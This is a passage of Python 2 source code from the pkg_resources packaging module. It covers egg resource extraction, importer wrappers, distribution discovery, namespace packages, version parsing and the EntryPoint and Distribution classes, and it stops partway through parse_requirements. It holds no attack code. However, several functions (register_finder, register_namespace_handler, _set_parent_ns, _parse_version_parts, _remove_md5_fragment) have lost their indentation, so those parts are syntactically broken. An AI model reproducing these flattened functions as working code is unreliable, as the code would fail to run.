    def get_resource_filename(self, manager, resource_name):
        """Extract the resource to the egg cache and return its path.

        If the requested resource is listed as "eager", all eager resources
        are extracted first (e.g. native libraries that must coexist).
        """
        if not self.egg_name:
            raise NotImplementedError(
                "resource_filename() only supported for .egg, not .zip"
            )
        # no need to lock for extraction, since we use temp names
        zip_path = self._resource_to_zip(resource_name)
        eagers = self._get_eager_resources()
        if '/'.join(self._parts(zip_path)) in eagers:
            for name in eagers:
                self._extract_resource(manager, self._eager_to_zip(name))
        return self._extract_resource(manager, zip_path)

    def _extract_resource(self, manager, zip_path):
        # Directories are extracted by recursing over their children.
        if zip_path in self._index():
            for name in self._index()[zip_path]:
                last = self._extract_resource(
                    manager, os.path.join(zip_path, name)
                )
            return os.path.dirname(last)  # return the extracted directory name

        # zip_stat fields: [3]=file size, [5]=DOS time, [6]=DOS date.
        zip_stat = self.zipinfo[zip_path]
        t,d,size = zip_stat[5], zip_stat[6], zip_stat[3]
        date_time = (
            (d>>9)+1980, (d>>5)&0xF, d&0x1F,                      # ymd
            (t&0xFFFF)>>11, (t>>5)&0x3F, (t&0x1F) * 2, 0, 0, -1   # hms, etc.
        )
        timestamp = time.mktime(date_time)

        try:
            if not WRITE_SUPPORT:
                raise IOError('"os.rename" and "os.unlink" are not supported '
                              'on this platform')

            real_path = manager.get_cache_path(
                self.egg_name, self._parts(zip_path)
            )

            if os.path.isfile(real_path):
                stat = os.stat(real_path)
                if stat.st_size==size and stat.st_mtime==timestamp:
                    # size and stamp match, don't bother extracting
                    return real_path

            # Write to a temp name, stamp it with the archive mtime, then
            # atomically rename into place.
            outf, tmpnam = _mkstemp(".$extract", dir=os.path.dirname(real_path))
            os.write(outf, self.loader.get_data(zip_path))
            os.close(outf)
            utime(tmpnam, (timestamp,timestamp))
            manager.postprocess(tmpnam, real_path)

            try:
                rename(tmpnam, real_path)

            except os.error:
                if os.path.isfile(real_path):
                    stat = os.stat(real_path)

                    if stat.st_size==size and stat.st_mtime==timestamp:
                        # size and stamp match, somebody did it just ahead of
                        # us, so we're done
                        return real_path
                    elif os.name=='nt':  # Windows, del old file and retry
                        unlink(real_path)
                        rename(tmpnam, real_path)
                        return real_path
                raise

        except os.error:
            manager.extraction_error()  # report a user-friendly error

        return real_path

    def _get_eager_resources(self):
        # Eager resources are listed in native_libs.txt / eager_resources.txt
        # metadata files; cache the merged list on first use.
        if self.eagers is None:
            eagers = []
            for name in ('native_libs.txt', 'eager_resources.txt'):
                if self.has_metadata(name):
                    eagers.extend(self.get_metadata_lines(name))
            self.eagers = eagers
        return self.eagers

    def _index(self):
        # Lazily build (and cache) a mapping of directory subpath ->
        # list of child names, derived from the zip directory cache.
        try:
            return self._dirindex
        except AttributeError:
            ind = {}
            for path in self.zipinfo:
                parts = path.split(os.sep)
                while parts:
                    parent = os.sep.join(parts[:-1])
                    if parent in ind:
                        ind[parent].append(parts[-1])
                        break
                    else:
                        ind[parent] = [parts.pop()]
            self._dirindex = ind
            return ind

    def _has(self, fspath):
        zip_path = self._zipinfo_name(fspath)
        return zip_path in self.zipinfo or zip_path in self._index()

    def _isdir(self,fspath):
        return self._zipinfo_name(fspath) in self._index()

    def _listdir(self,fspath):
        return list(self._index().get(self._zipinfo_name(fspath), ()))

    def _eager_to_zip(self,resource_name):
        return self._zipinfo_name(self._fn(self.egg_root,resource_name))

    def _resource_to_zip(self,resource_name):
        return self._zipinfo_name(self._fn(self.module_path,resource_name))
register_loader_type(zipimport.zipimporter, ZipProvider)
class FileMetadata(EmptyProvider):
    """Metadata handler for standalone PKG-INFO files

    Usage::

        metadata = FileMetadata("/path/to/PKG-INFO")

    This provider rejects all data and metadata requests except for PKG-INFO,
    which is treated as existing, and will be the contents of the file at
    the provided location.
    """

    def __init__(self, path):
        self.path = path

    def has_metadata(self, name):
        # PKG-INFO is the one and only metadata resource we expose.
        return name == 'PKG-INFO'

    def get_metadata(self, name):
        if name != 'PKG-INFO':
            raise KeyError("No metadata except PKG-INFO is available")
        handle = open(self.path, 'rU')
        contents = handle.read()
        handle.close()
        return contents

    def get_metadata_lines(self, name):
        return yield_lines(self.get_metadata(name))
class PathMetadata(DefaultProvider):
    """Metadata provider for egg directories

    Usage::

        # Development eggs:

        egg_info = "/path/to/PackageName.egg-info"
        base_dir = os.path.dirname(egg_info)
        metadata = PathMetadata(base_dir, egg_info)
        dist_name = os.path.splitext(os.path.basename(egg_info))[0]
        dist = Distribution(base_dir, project_name=dist_name, metadata=metadata)

        # Unpacked egg directories:

        egg_path = "/path/to/PackageName-ver-pyver-etc.egg"
        metadata = PathMetadata(egg_path, os.path.join(egg_path,'EGG-INFO'))
        dist = Distribution.from_filename(egg_path, metadata=metadata)
    """

    def __init__(self, path, egg_info):
        # `path` is the directory containing the package code; `egg_info`
        # is the directory holding the metadata files.
        self.module_path = path
        self.egg_info = egg_info
class EggMetadata(ZipProvider):
    """Metadata provider for .egg files"""

    def __init__(self, importer):
        """Create a metadata provider from a zipimporter"""
        archive = importer.archive
        self.zipinfo = zipimport._zip_directory_cache[archive]
        self.zip_pre = archive + os.sep
        self.loader = importer
        # A zipimporter with a prefix points inside the archive; without
        # one, the archive root is the module path.
        if importer.prefix:
            self.module_path = os.path.join(archive, importer.prefix)
        else:
            self.module_path = archive
        self._setup_prefix()
class ImpWrapper:
    """PEP 302 Importer that wraps Python's "normal" import algorithm"""

    def __init__(self, path=None):
        self.path = path

    def find_module(self, fullname, path=None):
        """Return an ``ImpLoader`` for `fullname`, or None if not found."""
        subname = fullname.rsplit(".", 1)[-1]
        # A meta-path wrapper (path is None) only handles top-level names.
        if subname != fullname and self.path is None:
            return None
        search = None if self.path is None else [self.path]
        try:
            file, filename, etc = imp.find_module(subname, search)
        except ImportError:
            return None
        return ImpLoader(file, filename, etc)
class ImpLoader:
    """PEP 302 Loader that wraps Python's "normal" import algorithm"""

    def __init__(self, file, filename, etc):
        self.file = file
        self.filename = filename
        self.etc = etc

    def load_module(self, fullname):
        """Load and return the module, always closing the open file."""
        try:
            module = imp.load_module(fullname, self.file, self.filename, self.etc)
        finally:
            if self.file:
                self.file.close()
        # Note: we don't set __loader__ because we want the module to look
        # normal; i.e. this is just a wrapper for standard import machinery
        return module
def get_importer(path_item):
    """Retrieve a PEP 302 "importer" for the given path item.

    If no path hook claims the item, a wrapper around the builtin import
    machinery is returned.  Only hook-created importers are cached.
    """
    if path_item in sys.path_importer_cache:
        importer = sys.path_importer_cache[path_item]
    else:
        importer = None
        for hook in sys.path_hooks:
            try:
                importer = hook(path_item)
            except ImportError:
                continue  # this hook doesn't handle the item; try the next
            break
        # Cache the hook result (possibly None) without clobbering any
        # entry another thread may have stored in the meantime.
        sys.path_importer_cache.setdefault(path_item, importer)
    if importer is None:
        try:
            importer = ImpWrapper(path_item)
        except ImportError:
            pass
    return importer
# Prefer the stdlib's equivalents when available (Python 2.5+); the
# hand-rolled ImpWrapper/ImpLoader above are only a 2.3/2.4 fallback.
try:
    from pkgutil import get_importer, ImpImporter
except ImportError:
    pass # Python 2.3 or 2.4, use our own implementation
else:
    ImpWrapper = ImpImporter # Python 2.5, use pkgutil's implementation
    del ImpLoader, ImpImporter
_distribution_finders = {}
def register_finder(importer_type, distribution_finder):
"""Register `distribution_finder` to find distributions in sys.path items
`importer_type` is the type or class of a PEP 302 "Importer" (sys.path item
handler), and `distribution_finder` is a callable that, passed a path
item and the importer instance, yields ``Distribution`` instances found on
that path item. See ``pkg_resources.find_on_path`` for an example."""
_distribution_finders[importer_type] = distribution_finder
def find_distributions(path_item, only=False):
    """Yield the distributions reachable through ``path_item``."""
    # Find the importer for this path entry, then dispatch to whichever
    # registered finder knows how to handle that importer's type.
    importer = get_importer(path_item)
    finder = _find_adapter(_distribution_finders, importer)
    return finder(importer, path_item, only)
def find_in_zip(importer, path_item, only=False):
    """Yield distributions inside a zipped egg, plus (unless ``only``)
    any eggs nested within it."""
    meta = EggMetadata(importer)
    if meta.has_metadata('PKG-INFO'):
        # The archive itself is a distribution.
        yield Distribution.from_filename(path_item, metadata=meta)
    if only:
        return # don't yield nested distros
    for entry in meta.resource_listdir('/'):
        if not entry.endswith('.egg'):
            continue
        nested = os.path.join(path_item, entry)
        for dist in find_in_zip(zipimport.zipimporter(nested), nested):
            yield dist

register_finder(zipimport.zipimporter, find_in_zip)
def StringIO(*args, **kw):
    """Thunk that replaces itself with the real StringIO on first use.

    The ``global`` declaration makes the function-local import rebind the
    module-level name, so subsequent calls go straight to the real class.
    """
    global StringIO
    try:
        from cStringIO import StringIO
    except ImportError:
        # cStringIO is unavailable on some builds; fall back to pure Python.
        from StringIO import StringIO
    return StringIO(*args, **kw)
def find_nothing(importer, path_item, only=False):
    """Fallback finder for importer types we don't know how to search."""
    return ()

register_finder(object, find_nothing)
def find_on_path(importer, path_item, only=False):
    """Yield distributions accessible on a sys.path directory"""
    path_item = _normalize_cached(path_item)
    if os.path.isdir(path_item) and os.access(path_item, os.R_OK):
        if path_item.lower().endswith('.egg'):
            # unpacked egg: the directory itself is one distribution
            yield Distribution.from_filename(
                path_item, metadata=PathMetadata(
                    path_item, os.path.join(path_item,'EGG-INFO')
                )
            )
        else:
            # scan for .egg and .egg-info in directory
            for entry in os.listdir(path_item):
                lower = entry.lower()
                if lower.endswith('.egg-info'):
                    fullpath = os.path.join(path_item, entry)
                    if os.path.isdir(fullpath):
                        # egg-info directory, allow getting metadata
                        metadata = PathMetadata(path_item, fullpath)
                    else:
                        # single-file .egg-info
                        metadata = FileMetadata(fullpath)
                    yield Distribution.from_location(
                        path_item,entry,metadata,precedence=DEVELOP_DIST
                    )
                elif not only and lower.endswith('.egg'):
                    # nested egg (zip or directory): recurse via the registry
                    for dist in find_distributions(os.path.join(path_item, entry)):
                        yield dist
                elif not only and lower.endswith('.egg-link'):
                    # .egg-link: each line is a path to follow; only the first
                    # non-blank line is used (the inner `break`).
                    # NOTE: the file object is never closed explicitly; this
                    # relies on CPython's refcounting to close it.
                    for line in open(os.path.join(path_item, entry)):
                        if not line.strip(): continue
                        for item in find_distributions(os.path.join(path_item,line.rstrip())):
                            yield item
                        break
register_finder(ImpWrapper,find_on_path)
_namespace_handlers = {}
_namespace_packages = {}
def register_namespace_handler(importer_type, namespace_handler):
"""Register `namespace_handler` to declare namespace packages
`importer_type` is the type or class of a PEP 302 "Importer" (sys.path item
handler), and `namespace_handler` is a callable like this::
def namespace_handler(importer,path_entry,moduleName,module):
# return a path_entry to use for child packages
Namespace handlers are only called if the importer object has already
agreed that it can handle the relevant path item, and they should only
return a subpath if the module __path__ does not already contain an
equivalent subpath. For an example namespace handler, see
``pkg_resources.file_ns_handler``.
"""
_namespace_handlers[importer_type] = namespace_handler
def _handle_ns(packageName, path_item):
    """Ensure that named package includes a subpath of path_item (if needed)"""
    importer = get_importer(path_item)
    if importer is None:
        return None
    loader = importer.find_module(packageName)
    if loader is None:
        # path_item doesn't contain this package at all
        return None
    module = sys.modules.get(packageName)
    if module is None:
        # create an empty namespace module and hook it into its parent
        module = sys.modules[packageName] = types.ModuleType(packageName)
        module.__path__ = []; _set_parent_ns(packageName)
    elif not hasattr(module,'__path__'):
        raise TypeError("Not a package:", packageName)
    handler = _find_adapter(_namespace_handlers, importer)
    subpath = handler(importer,path_item,packageName,module)
    if subpath is not None:
        # Append the new subpath, then reload the package.  load_module may
        # replace __path__, so the extended list is saved first and restored
        # afterwards.
        path = module.__path__; path.append(subpath)
        loader.load_module(packageName); module.__path__ = path
    return subpath
def declare_namespace(packageName):
    """Declare that package 'packageName' is a namespace package"""
    # Hold the import lock: this mutates sys.modules and package __path__
    # lists just like a real import would.
    imp.acquire_lock()
    try:
        if packageName in _namespace_packages:
            return  # already declared
        path, parent = sys.path, None
        if '.' in packageName:
            # Recursively declare and import the parent so its __path__
            # determines where this child may be found.
            parent = '.'.join(packageName.split('.')[:-1])
            declare_namespace(parent)
            __import__(parent)
            try:
                path = sys.modules[parent].__path__
            except AttributeError:
                raise TypeError("Not a package:", parent)
        # Track what packages are namespaces, so when new path items are added,
        # they can be updated
        _namespace_packages.setdefault(parent,[]).append(packageName)
        _namespace_packages.setdefault(packageName,[])
        for path_item in path:
            # Ensure all the parent's path items are reflected in the child,
            # if they apply
            _handle_ns(packageName, path_item)
    finally:
        imp.release_lock()
def fixup_namespace_packages(path_item, parent=None):
    """Make every already-declared namespace package pick up ``path_item``."""
    # Serialize against other importers, exactly as a normal import would.
    imp.acquire_lock()
    try:
        for child in _namespace_packages.get(parent, ()):
            extension = _handle_ns(child, path_item)
            if extension:
                # The child gained a subpath; recurse so grandchildren see it.
                fixup_namespace_packages(extension, child)
    finally:
        imp.release_lock()
def file_ns_handler(importer, path_item, packageName, module):
    """Compute an ns-package subpath for a filesystem or zipfile importer"""
    candidate = os.path.join(path_item, packageName.split('.')[-1])
    wanted = _normalize_cached(candidate)
    for existing in module.__path__:
        if _normalize_cached(existing) == wanted:
            # An equivalent entry is already on __path__; add nothing.
            return None
    return candidate

register_namespace_handler(ImpWrapper, file_ns_handler)
register_namespace_handler(zipimport.zipimporter, file_ns_handler)
def null_ns_handler(importer, path_item, packageName, module):
    """Fallback handler: unknown importer types contribute no subpaths."""
    return None

register_namespace_handler(object, null_ns_handler)
def normalize_path(filename):
    """Return a canonical form of `filename` for equality comparisons.

    Symlinks and relative segments are resolved, and case is folded on
    case-insensitive filesystems, so two spellings of one file compare equal.
    """
    resolved = os.path.realpath(filename)
    return os.path.normcase(resolved)
def _normalize_cached(filename, _cache={}):
    # Memoized normalize_path(): normalization hits the filesystem
    # (realpath), so results are cached for the life of the process in
    # the shared default-argument dict.
    try:
        return _cache[filename]
    except KeyError:
        result = _cache[filename] = normalize_path(filename)
        return result
def _set_parent_ns(packageName):
parts = packageName.split('.')
name = parts.pop()
if parts:
parent = '.'.join(parts)
setattr(sys.modules[parent], name, sys.modules[packageName])
def yield_lines(strs):
    """Yield non-empty/non-comment lines of a ``basestring`` or sequence"""
    if isinstance(strs, basestring):
        for raw in strs.splitlines():
            stripped = raw.strip()
            # skip blank lines and comment-only lines
            if stripped and not stripped.startswith('#'):
                yield stripped
    else:
        # arbitrarily nested iterable of strings: flatten recursively
        for element in strs:
            for stripped in yield_lines(element):
                yield stripped
# Pre-bound ``match`` methods used by the requirement / entry-point parsers
# below; each is applied at the current parse position within a line.
LINE_END = re.compile(r"\s*(#.*)?$").match         # whitespace and comment
CONTINUE = re.compile(r"\s*\\\s*(#.*)?$").match    # line continuation
DISTRO = re.compile(r"\s*((\w|[-.])+)").match      # Distribution or extra
VERSION = re.compile(r"\s*(<=?|>=?|==|!=)\s*((\w|[-.])+)").match  # ver. info
COMMA = re.compile(r"\s*,").match                  # comma between items
OBRACKET = re.compile(r"\s*\[").match              # opening '[' of extras list
CBRACKET = re.compile(r"\s*\]").match              # closing ']' of extras list
MODULE = re.compile(r"\w+(\.\w+)*$").match         # dotted module/group name
# Egg filename pieces: name[-version[-pyX.Y[-platform]]].
# re.VERBOSE means the literal spaces below are ignored, not matched.
EGG_NAME = re.compile(
    r"(?P<name>[^-]+)"
    r"( -(?P<ver>[^-]+) (-py(?P<pyver>[^-]+) (-(?P<plat>.+))? )? )?",
    re.VERBOSE | re.IGNORECASE
).match
component_re = re.compile(r'(\d+ | [a-z]+ | \.| -)', re.VERBOSE)
replace = {'pre':'c', 'preview':'c','-':'final-','rc':'c','dev':'@'}.get
def _parse_version_parts(s):
for part in component_re.split(s):
part = replace(part,part)
if not part or part=='.':
continue
if part[:1] in '0123456789':
yield part.zfill(8) # pad for numeric comparison
else:
yield '*'+part
yield '*final' # ensure that alpha/beta/candidate are before final
def parse_version(s):
    """Convert a version string to a chronologically-sortable key

    This is a rough cross between distutils' StrictVersion and LooseVersion;
    if you give it versions that would work with StrictVersion, then it behaves
    the same; otherwise it acts like a slightly-smarter LooseVersion. It is
    *possible* to create pathological version coding schemes that will fool
    this parser, but they should be very rare in practice.

    The returned value will be a tuple of strings.  Numeric portions of the
    version are padded to 8 digits so they will compare numerically, but
    without relying on how numbers compare relative to strings.  Dots are
    dropped, but dashes are retained.  Trailing zeros between alpha segments
    or dashes are suppressed, so that e.g. "2.4.0" is considered the same as
    "2.4". Alphanumeric parts are lower-cased.

    The algorithm assumes that strings like "-" and any alpha string that
    alphabetically follows "final"  represents a "patch level".  So, "2.4-1"
    is assumed to be a branch or patch of "2.4", and therefore "2.4.1" is
    considered newer than "2.4-1", which in turn is newer than "2.4".

    Strings like "a", "b", "c", "alpha", "beta", "candidate" and so on (that
    come before "final" alphabetically) are assumed to be pre-release versions,
    so that the version "2.4" is considered newer than "2.4a1".

    Finally, to handle miscellaneous cases, the strings "pre", "preview", and
    "rc" are treated as if they were "c", i.e. as though they were release
    candidates, and therefore are not as new as a version string that does not
    contain them, and "dev" is replaced with an '@' so that it sorts lower than
    than any other pre-release tag.
    """
    parts = []
    for part in _parse_version_parts(s.lower()):
        if part.startswith('*'):
            # '*'-prefixed parts are tags; tidy up what precedes them so
            # equivalent spellings produce identical keys.
            if part<'*final':   # remove '-' before a prerelease tag
                while parts and parts[-1]=='*final-': parts.pop()
            # remove trailing zeros from each series of numeric parts
            while parts and parts[-1]=='00000000':
                parts.pop()
        parts.append(part)
    return tuple(parts)
class EntryPoint(object):
    """Object representing an advertised importable object"""
    def __init__(self, name, module_name, attrs=(), extras=(), dist=None):
        if not MODULE(module_name):
            raise ValueError("Invalid module name", module_name)
        self.name = name
        self.module_name = module_name
        self.attrs = tuple(attrs)
        # Parse extras through a dummy requirement so they get the same
        # validation/normalization as requirement extras.
        self.extras = Requirement.parse(("x[%s]" % ','.join(extras))).extras
        self.dist = dist
    def __str__(self):
        # Render back to "name = module:attrs [extras]" form.
        s = "%s = %s" % (self.name, self.module_name)
        if self.attrs:
            s += ':' + '.'.join(self.attrs)
        if self.extras:
            s += ' [%s]' % ','.join(self.extras)
        return s
    def __repr__(self):
        return "EntryPoint.parse(%r)" % str(self)
    def load(self, require=True, env=None, installer=None):
        # Import the module and walk the dotted attribute chain, resolving
        # dependencies first unless ``require`` is false.
        if require: self.require(env, installer)
        entry = __import__(self.module_name, globals(),globals(), ['__name__'])
        for attr in self.attrs:
            try:
                entry = getattr(entry,attr)
            except AttributeError:
                raise ImportError("%r has no %r attribute" % (entry,attr))
        return entry
    def require(self, env=None, installer=None):
        if self.extras and not self.dist:
            raise UnknownExtra("Can't require() without a distribution", self)
        # map() is eager under Python 2 (this module targets 2.x), so every
        # resolved distribution is added to the working set immediately.
        map(working_set.add,
            working_set.resolve(self.dist.requires(self.extras),env,installer))
    #@classmethod
    def parse(cls, src, dist=None):
        """Parse a single entry point from string `src`

        Entry point syntax follows the form::

            name = some.module:some.attr [extra1,extra2]

        The entry name and module name are required, but the ``:attrs`` and
        ``[extras]`` parts are optional
        """
        try:
            attrs = extras = ()
            name,value = src.split('=',1)
            if '[' in value:
                value,extras = value.split('[',1)
                req = Requirement.parse("x["+extras)
                if req.specs: raise ValueError
                extras = req.extras
            if ':' in value:
                value,attrs = value.split(':',1)
                if not MODULE(attrs.rstrip()):
                    raise ValueError
                attrs = attrs.rstrip().split('.')
        except ValueError:
            raise ValueError(
                "EntryPoint must be in 'name=module:attrs [extras]' format",
                src
            )
        else:
            return cls(name.strip(), value.strip(), attrs, extras, dist)
    # classmethod() call instead of a decorator keeps Python 2.3 support.
    parse = classmethod(parse)
    #@classmethod
    def parse_group(cls, group, lines, dist=None):
        """Parse an entry point group"""
        if not MODULE(group):
            raise ValueError("Invalid group name", group)
        this = {}
        for line in yield_lines(lines):
            ep = cls.parse(line, dist)
            if ep.name in this:
                raise ValueError("Duplicate entry point", group, ep.name)
            this[ep.name]=ep
        return this
    parse_group = classmethod(parse_group)
    #@classmethod
    def parse_map(cls, data, dist=None):
        """Parse a map of entry point groups"""
        # Accept either a {group: lines} dict or INI-style sectioned text.
        if isinstance(data,dict):
            data = data.items()
        else:
            data = split_sections(data)
        maps = {}
        for group, lines in data:
            if group is None:
                if not lines:
                    continue
                raise ValueError("Entry points must be listed in groups")
            group = group.strip()
            if group in maps:
                raise ValueError("Duplicate group name", group)
            maps[group] = cls.parse_group(group, lines, dist)
        return maps
    parse_map = classmethod(parse_map)
def _remove_md5_fragment(location):
if not location:
return ''
parsed = urlparse(location)
if parsed[-1].startswith('md5='):
return urlunparse(parsed[:-1] + ('',))
return location
class Distribution(object):
    """Wrap an actual or potential sys.path entry w/metadata"""
    def __init__(self,
        location=None, metadata=None, project_name=None, version=None,
        py_version=PY_MAJOR, platform=None, precedence = EGG_DIST
    ):
        self.project_name = safe_name(project_name or 'Unknown')
        if version is not None:
            self._version = safe_version(version)
        self.py_version = py_version
        self.platform = platform
        self.location = location
        self.precedence = precedence
        # All metadata access is delegated to the provider (see __getattr__).
        self._provider = metadata or empty_provider
    #@classmethod
    def from_location(cls,location,basename,metadata=None,**kw):
        # Parse name/version/pyver/platform out of an egg(-info) filename.
        project_name, version, py_version, platform = [None]*4
        basename, ext = os.path.splitext(basename)
        if ext.lower() in (".egg",".egg-info"):
            match = EGG_NAME(basename)
            if match:
                project_name, version, py_version, platform = match.group(
                    'name','ver','pyver','plat'
                )
        return cls(
            location, metadata, project_name=project_name, version=version,
            py_version=py_version, platform=platform, **kw
        )
    from_location = classmethod(from_location)
    # Comparison/sort key: newer versions and higher precedence sort last.
    hashcmp = property(
        lambda self: (
            getattr(self,'parsed_version',()),
            self.precedence,
            self.key,
            _remove_md5_fragment(self.location),
            self.py_version,
            self.platform
        )
    )
    def __hash__(self): return hash(self.hashcmp)
    def __lt__(self, other):
        return self.hashcmp < other.hashcmp
    def __le__(self, other):
        return self.hashcmp <= other.hashcmp
    def __gt__(self, other):
        return self.hashcmp > other.hashcmp
    def __ge__(self, other):
        return self.hashcmp >= other.hashcmp
    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            # It's not a Distribution, so they are not equal
            return False
        return self.hashcmp == other.hashcmp
    def __ne__(self, other):
        return not self == other
    # These properties have to be lazy so that we don't have to load any
    # metadata until/unless it's actually needed.  (i.e., some distributions
    # may not know their name or version without loading PKG-INFO)
    #@property
    def key(self):
        try:
            return self._key
        except AttributeError:
            self._key = key = self.project_name.lower()
            return key
    key = property(key)
    #@property
    def parsed_version(self):
        try:
            return self._parsed_version
        except AttributeError:
            self._parsed_version = pv = parse_version(self.version)
            return pv
    parsed_version = property(parsed_version)
    #@property
    def version(self):
        try:
            return self._version
        except AttributeError:
            # No version was supplied; fall back to the PKG-INFO metadata.
            for line in self._get_metadata('PKG-INFO'):
                if line.lower().startswith('version:'):
                    self._version = safe_version(line.split(':',1)[1].strip())
                    return self._version
            else:
                raise ValueError(
                    "Missing 'Version:' header and/or PKG-INFO file", self
                )
    version = property(version)
    #@property
    def _dep_map(self):
        # Lazily built mapping of extra-name (or None) -> [Requirement, ...].
        try:
            return self.__dep_map
        except AttributeError:
            dm = self.__dep_map = {None: []}
            for name in 'requires.txt', 'depends.txt':
                for extra,reqs in split_sections(self._get_metadata(name)):
                    if extra: extra = safe_extra(extra)
                    dm.setdefault(extra,[]).extend(parse_requirements(reqs))
            return dm
    _dep_map = property(_dep_map)
    def requires(self,extras=()):
        """List of Requirements needed for this distro if `extras` are used"""
        dm = self._dep_map
        deps = []
        deps.extend(dm.get(None,()))
        for ext in extras:
            try:
                deps.extend(dm[safe_extra(ext)])
            except KeyError:
                raise UnknownExtra(
                    "%s has no such extra feature %r" % (self, ext)
                )
        return deps
    def _get_metadata(self,name):
        # Yield the lines of metadata file `name`, or nothing if it's absent.
        if self.has_metadata(name):
            for line in self.get_metadata_lines(name):
                yield line
    def activate(self,path=None):
        """Ensure distribution is importable on `path` (default=sys.path)"""
        if path is None: path = sys.path
        self.insert_on(path)
        if path is sys.path:
            fixup_namespace_packages(self.location)
            # map() is eager under Python 2, so each namespace package is
            # declared immediately.
            map(declare_namespace, self._get_metadata('namespace_packages.txt'))
    def egg_name(self):
        """Return what this distribution's standard .egg filename should be"""
        filename = "%s-%s-py%s" % (
            to_filename(self.project_name), to_filename(self.version),
            self.py_version or PY_MAJOR
        )
        if self.platform:
            filename += '-'+self.platform
        return filename
    def __repr__(self):
        if self.location:
            return "%s (%s)" % (self,self.location)
        else:
            return str(self)
    def __str__(self):
        # `version` may raise ValueError when metadata is missing; degrade
        # gracefully to a placeholder.
        try: version = getattr(self,'version',None)
        except ValueError: version = None
        version = version or "[unknown version]"
        return "%s %s" % (self.project_name,version)
    def __getattr__(self,attr):
        """Delegate all unrecognized public attributes to .metadata provider"""
        if attr.startswith('_'):
            # NOTE: Python 2 raise syntax.
            raise AttributeError,attr
        return getattr(self._provider, attr)
    #@classmethod
    def from_filename(cls,filename,metadata=None, **kw):
        return cls.from_location(
            _normalize_cached(filename), os.path.basename(filename), metadata,
            **kw
        )
    from_filename = classmethod(from_filename)
    def as_requirement(self):
        """Return a ``Requirement`` that matches this distribution exactly"""
        return Requirement.parse('%s==%s' % (self.project_name, self.version))
    def load_entry_point(self, group, name):
        """Return the `name` entry point of `group` or raise ImportError"""
        ep = self.get_entry_info(group,name)
        if ep is None:
            raise ImportError("Entry point %r not found" % ((group,name),))
        return ep.load()
    def get_entry_map(self, group=None):
        """Return the entry point map for `group`, or the full entry map"""
        try:
            ep_map = self._ep_map
        except AttributeError:
            # Parse entry_points.txt once and cache the result.
            ep_map = self._ep_map = EntryPoint.parse_map(
                self._get_metadata('entry_points.txt'), self
            )
        if group is not None:
            return ep_map.get(group,{})
        return ep_map
    def get_entry_info(self, group, name):
        """Return the EntryPoint object for `group`+`name`, or ``None``"""
        return self.get_entry_map(group).get(name)
    def insert_on(self, path, loc = None):
        """Insert self.location in path before its nearest parent directory"""
        loc = loc or self.location
        # distribute refuses to coexist with a 0.7-series setuptools.
        if self.project_name == 'setuptools':
            try:
                version = self.version
            except ValueError:
                version = ''
            if version.startswith('0.7'):
                raise ValueError(
                    "A 0.7-series setuptools cannot be installed "
                    "with distribute. Found one at %s" % str(self.location))
        if not loc:
            return
        if path is sys.path:
            self.check_version_conflict()
        nloc = _normalize_cached(loc)
        bdir = os.path.dirname(nloc)
        # npath is the normalized mirror of `path`; both lists are edited in
        # lockstep below.  (Eager Python 2 map() yields a real list here.)
        npath= map(_normalize_cached, path)
        bp = None
        for p, item in enumerate(npath):
            if item==nloc:
                break
            elif item==bdir and self.precedence==EGG_DIST:
                # if it's an .egg, give it precedence over its directory
                path.insert(p, loc)
                npath.insert(p, nloc)
                break
        else:
            path.append(loc)
            return
        # p is the spot where we found or inserted loc; now remove duplicates
        while 1:
            try:
                np = npath.index(nloc, p+1)
            except ValueError:
                break
            else:
                del npath[np], path[np]
                p = np  # ha!
        return
    def check_version_conflict(self):
        # Warn when a top-level module of this distribution was already
        # imported from some other location than the one being added.
        if self.key=='distribute':
            return # ignore the inevitable setuptools self-conflicts :(
        nsp = dict.fromkeys(self._get_metadata('namespace_packages.txt'))
        loc = normalize_path(self.location)
        for modname in self._get_metadata('top_level.txt'):
            if (modname not in sys.modules or modname in nsp
                or modname in _namespace_packages
            ):
                continue
            if modname in ('pkg_resources', 'setuptools', 'site'):
                continue
            fn = getattr(sys.modules[modname], '__file__', None)
            if fn and (normalize_path(fn).startswith(loc) or
                       fn.startswith(self.location)):
                continue
            issue_warning(
                "Module %s was already imported from %s, but %s is being added"
                " to sys.path" % (modname, fn, self.location),
            )
    def has_version(self):
        # False (with a warning) when the version metadata is missing.
        try:
            self.version
        except ValueError:
            issue_warning("Unbuilt egg for "+repr(self))
            return False
        return True
    def clone(self,**kw):
        """Copy this distribution, substituting in any changed keyword args"""
        for attr in (
            'project_name', 'version', 'py_version', 'platform', 'location',
            'precedence'
        ):
            kw.setdefault(attr, getattr(self,attr,None))
        kw.setdefault('metadata', self._provider)
        return self.__class__(**kw)
    #@property
    def extras(self):
        # All declared extras (the None key holds the unconditional deps).
        return [dep for dep in self._dep_map if dep]
    extras = property(extras)
def issue_warning(*args, **kw):
    """Emit a warning attributed to the first caller outside this module."""
    our_globals = globals()
    depth = 1
    try:
        # Walk outward until we leave frames belonging to this module, so
        # the warning points at user code rather than pkg_resources itself.
        while sys._getframe(depth).f_globals is our_globals:
            depth += 1
    except ValueError:
        pass  # ran off the top of the stack; use the deepest level found
    from warnings import warn
    warn(stacklevel = depth+1, *args, **kw)
def parse_requirements(strs):
    """Yield ``Requirement`` objects for each specification in `strs`

    `strs` must be an instance of ``basestring``, or a (possibly-nested)
    iterable thereof.
    """
    # create a steppable iterator, so we can handle \-continuations
    lines = iter(yield_lines(strs))
    def scan_list(ITEM,TERMINATOR,line,p,groups,item_name):
        # Consume a comma-separated list of ITEM matches starting at
        # position `p` of `line`, ending at TERMINATOR.  Returns the
        # (possibly advanced) line, the new position, and the items.
        items = []
        while not TERMINATOR(line,p):
            if CONTINUE(line,p):
                # Backslash continuation: pull the next logical line.
                # NOTE: `.next()` is the Python 2 iterator protocol.
                try:
                    line = lines.next(); p = 0
                except StopIteration:
                    raise ValueError(
                        "\\ must not appear on the last nonblank line"
                    )
            match = ITEM(line,p)
            if not match:
                raise ValueError("Expected "+item_name+" in",line,"at",line[p:])
            items.append(match.group(*groups))
            p = match.end()
            match = COMMA(line,p)
            if match:
                p = match.end() # skip the comma
            elif not TERMINATOR(line,p):
                raise ValueError(
                    "Expected ',' or end-of-list in",line,"at",line[p:]
                )
        match = TERMINATOR(line,p)
        if match: p = match.end()   # skip the terminator, if any
        return line, p, items
    for line in lines:
        # Each logical line is: name [extras] version-specs
        match = DISTRO(line)
        if not match:
            raise ValueError("Missing distribution spec", line)
        project_name = match.group(1)
        p = match.end()
        extras = []
        match = OBRACKET(line,p)
        if match:
            p = match.end()
            line, p, extras = scan_list(
